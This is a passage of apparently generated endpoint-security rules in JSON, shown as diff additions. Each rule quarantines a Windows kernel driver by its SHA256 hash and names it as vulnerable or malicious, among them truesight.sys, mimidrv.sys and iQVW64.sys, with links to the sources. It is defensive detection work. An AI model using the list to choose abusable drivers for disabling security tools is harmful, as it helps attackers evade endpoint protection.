"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143881Z", + "creation_date": "2026-03-23T11:45:32.143883Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143889Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ebf6be42d39fd5d9361afa43479f883ff8eba97d72f313ece289f78cb51c22f2", + "comment": "Vulnerable Kernel Driver (aka Afd.sys) [https://www.loldrivers.io/drivers/394f49b2-2d78-4d0d-b374-1399695455f3/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fabdc89c-665b-564b-81fc-bb3d16021c83", 
+ "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826813Z", + "creation_date": "2026-03-23T11:45:31.826815Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826820Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "806a9d7578501708a51b0ba5dbd983213dc0dd9ef3818e7b4df2ce520f66dc0c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fabdecc6-6e04-559b-870a-ca18a1b5183d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979585Z", + "creation_date": "2026-03-23T11:45:29.979587Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.979592Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ee267fc3d0ac2662a9cfdb0ed5a2354ee09ef4c218303f20350177cae125cf7", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fac04190-ac64-54a0-9a24-55afd3585784", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826848Z", + "creation_date": "2026-03-23T11:45:31.826850Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826856Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5da0f06fdf2f531ce5caac5ea77238fe13fbc3d8bada7bbb36fc1eaa07799a32", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fac2f9c1-1536-51fa-aef8-0d00befff49a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499511Z", + "creation_date": "2026-03-23T11:45:31.499514Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499523Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "544347a5b7c60b9a501f02b06e51a3c0bc7664b1fe19e85195aa4f0c79d852a9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "faccc13c-b498-578e-8a69-622adab7e1bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978032Z", + "creation_date": "2026-03-23T11:45:29.978034Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978039Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff", + "comment": "Vulnerable Kernel Driver (aka bw.sys) [https://www.loldrivers.io/drivers/578d4909-c2ba-4363-b6e3-98fb62d5e55c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fad2a4e0-97c0-5144-9722-951def34f0e6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479740Z", + "creation_date": "2026-03-23T11:45:30.479742Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479747Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4e5cdf9d41843ecf7f9e252b706a0c5ca89ce288a4944ee70dd43fcc06965a8f", + "comment": "Malicious Kernel Driver (aka a9df5964635ef8bd567ae487c3d214c4.sys) [https://www.loldrivers.io/drivers/ac62e709-4aa5-41f4-87b1-b811283d70d1/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fad432ed-ceec-502d-8842-59b2284a4619", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157639Z", + "creation_date": "2026-03-23T11:45:31.157641Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157649Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b984209f1d5d681a3bbc876ddb90fd5905155cd0ec5449803e5debd9d066e11", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fad5e050-ef9d-560a-8ef2-fac9adc40a31", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606157Z", + "creation_date": "2026-03-23T11:45:29.606158Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606164Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a48f92a9c2d95a72e18055cac28c1e7e6cad5f47aa735cbea5c3b82813ccfaf", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fadaa988-2483-5eec-a37b-006823421bb2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160030Z", + "creation_date": "2026-03-23T11:45:31.160032Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160037Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4909d7e50d71ea4cd72b68a9d9c1a12a96cf1f9d6ff04272e5403ff58cdd31bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fadbc017-3cec-5f06-91fa-6af3c4f43f2a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150233Z", + "creation_date": "2026-03-23T11:45:31.150235Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150241Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c3ba841467677571942294277c9f922fb79c5de289e7cefda14767e1cb4fd46", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "faf7a12e-4b82-56dc-aa07-7fc9175ba00e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153284Z", + "creation_date": "2026-03-23T11:45:31.153287Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153294Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dcbfdf5bb3562ab624d954fc95007ca2baa9e6f217ebd7ee2dcc1591a949e211", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fafe9b15-ae6a-52fe-b9f8-1adf16e6d85d", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811542Z", + "creation_date": "2026-03-23T11:45:31.811544Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811550Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ec936428caafb5e535b9d0cacce885185e314c659746c19dbee4edbd21aeb513", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fb09e78f-4c0a-57ab-aba2-8e81cb33bf19", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159158Z", + "creation_date": "2026-03-23T11:45:31.159160Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159165Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1021ecbde5a241cb33013cfe9c345f964547a03e79d19b53490e5d33169ea8c6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fb21dc1e-0723-5a94-8ddf-72edd3f5d68a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826438Z", + "creation_date": "2026-03-23T11:45:31.826440Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826445Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "55c0a887f87469e26616fe0641d83c971a3024181bd0e53a4250afae53be1a63", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fb27bc42-e488-5f01-995f-79e61d6f6802", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621409Z", + "creation_date": "2026-03-23T11:45:29.621411Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621417Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26453afb1f808f64bec87a2532a9361b696c0ed501d6b973a1f1b5ae152a4d40", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fb31c830-53bf-54d2-8fd6-825779e21050", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468692Z", + "creation_date": "2026-03-23T11:45:30.468695Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468704Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "869f22f072f71abc741cf9d3b9cbc9020a2611286670c6e6d67cd240629518f6", + "comment": "Malicious Kernel 
Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fb3749f5-6e21-5cca-8532-836149bdf73f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495984Z", + "creation_date": "2026-03-23T11:45:31.495987Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee3a1b13c31103c100ada53e267d1fa27a0573aa54919d29249b66fd9507a9b6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fb3d6cd5-b776-5f54-bf11-f21218709141", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.968203Z", + "creation_date": "2026-03-23T11:45:29.968205Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968210Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "810513b3f4c8d29afb46f71816350088caacf46f1be361af55b26f3fee4662c3", + "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fb47e5b1-d5e2-5741-9d14-fecf7dfaa15d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620159Z", + "creation_date": "2026-03-23T11:45:29.620161Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620166Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29e0062a017a93b2f2f5207a608a96df4d554c5de976bd0276c2590a03bd3e94", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"fb4aa9a3-9491-5088-93a0-7542d0bb2ad4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971926Z", + "creation_date": "2026-03-23T11:45:29.971927Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971933Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f6ef002bf7603672cf350831065aa3664f930e9587ae8fd3bfc93ca3f21a707", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fb52a350-3a84-58c0-821f-7defafc2ccca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619106Z", + "creation_date": "2026-03-23T11:45:29.619108Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.619113Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "46cb4aabe49917be885f2c42ade92aceda6b9d0b7739cf0e7c3c6d93820b67c3", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fb5481e1-78a0-507e-905f-01aea27dbabe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974909Z", + "creation_date": "2026-03-23T11:45:29.974911Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974916Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab3e5217c5ec836a882d68a23b017de5b4f88328510e4bcb9564759926aec89f", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fb5a53bd-d5a1-572a-a4a0-8b9b1ad5eac5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143242Z", + "creation_date": "2026-03-23T11:45:32.143244Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143250Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7cb497abc44aad09a38160d6a071db499e05ff5871802ccc45d565d242026ee7", + "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "fb640e01-dff7-5a80-a110-79e5cdbf1264", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815804Z", + "creation_date": "2026-03-23T11:45:30.815806Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815811Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, 
